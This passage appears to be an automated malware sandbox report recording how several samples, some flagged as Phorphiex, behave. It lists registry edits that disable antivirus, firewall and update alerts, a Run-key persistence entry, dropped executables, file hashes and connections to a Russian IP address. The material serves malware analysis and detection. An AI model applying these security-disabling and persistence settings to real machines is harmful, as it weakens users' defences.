| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{962E12C1-3F0D-11ED-AD72-5E7A81A7298C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{962E39D1-3F0D-11ED-AD72-5E7A81A7298C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121309" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe
"C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe"
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1892 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2016-54-0x0000000075A71000-0x0000000075A73000-memory.dmp
\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1128-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/2016-60-0x0000000000260000-0x00000000002BD000-memory.dmp
memory/2016-61-0x0000000000260000-0x00000000002BD000-memory.dmp
memory/2016-59-0x0000000000B70000-0x0000000000B91000-memory.dmp
memory/1128-62-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{962E39D1-3F0D-11ED-AD72-5E7A81A7298C}.dat
| MD5 | 33be23a4b42425b03e02c4ce38a411f0 |
| SHA1 | ef70ab30d305b07410c6c12402c71569794e1074 |
| SHA256 | d3e07bad00b9edb23c7dd1963772a81bae305b1a48d5b79238aa781f30471bdf |
| SHA512 | e1d1643ec3aa03d45e134061a383d138d54a81a47ee2fc5d19362ee8c5fdd9c5d90fee6ecdf76fea59bf6bdd90e45b2ea4d4adf6f46bcf053719508bf22754f6 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{962E12C1-3F0D-11ED-AD72-5E7A81A7298C}.dat
| MD5 | 43940b572d9dc63bac09d3e4c0752efc |
| SHA1 | 6a93a6e358592609e61d43e17693ec8ba5f7adf4 |
| SHA256 | 96bc631bade5c6f4abca08f3d15ce3a2575b9af6854915a5f3d12a28182f0092 |
| SHA512 | 66afd932f900dc260295421255737cf2fe735e6047c268683bd37e8d83bcdfbe5ad817bc93fbb354bb4217a1ea9e4ae05797ab356928f2376a0d76b058ce6706 |
memory/1128-65-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2016-66-0x0000000000260000-0x00000000002BD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2U1GSVF2.txt
| MD5 | 917b73aae0026a1518c39377f76da41f |
| SHA1 | 62a69ac2baacbfdfa979fe88a503321fce30582f |
| SHA256 | 88e4fee1c7144793486d42d33b50d37d654854cf2a7ff2ca8075912611353b31 |
| SHA512 | 68cddf29a0d55e2fe25a7608cf5fd5bf1ac45be96528cb7fc3e407388205c3d9dc249575e4c232d01611e8238508a285a082d70b8bcc72ffbf1390ca9f602778 |
Analysis: behavioral10
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
153s
Max time network
154s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2306424816.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysfgdrvs.exe" | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
| File opened for modification | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\199244406.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
"C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe"
C:\Windows\sysfgdrvs.exe
C:\Windows\sysfgdrvs.exe
C:\Users\Admin\AppData\Local\Temp\199244406.exe
C:\Users\Admin\AppData\Local\Temp\199244406.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/4928-132-0x0000000000000000-mapping.dmp
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
memory/1984-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\199244406.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\2306424816.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral14
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220901-en
Max time kernel
82s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
"C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe"
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5036 -ip 5036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | N/A | tcp |
| NL | 104.80.225.205:443 | N/A | tcp |
| GB | 51.132.193.104:443 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
Files
memory/1284-135-0x0000000000F40000-0x0000000000F61000-memory.dmp
memory/5036-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/5036-139-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1284-140-0x0000000000F40000-0x0000000000F61000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220901-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\640611173.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\326623531.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
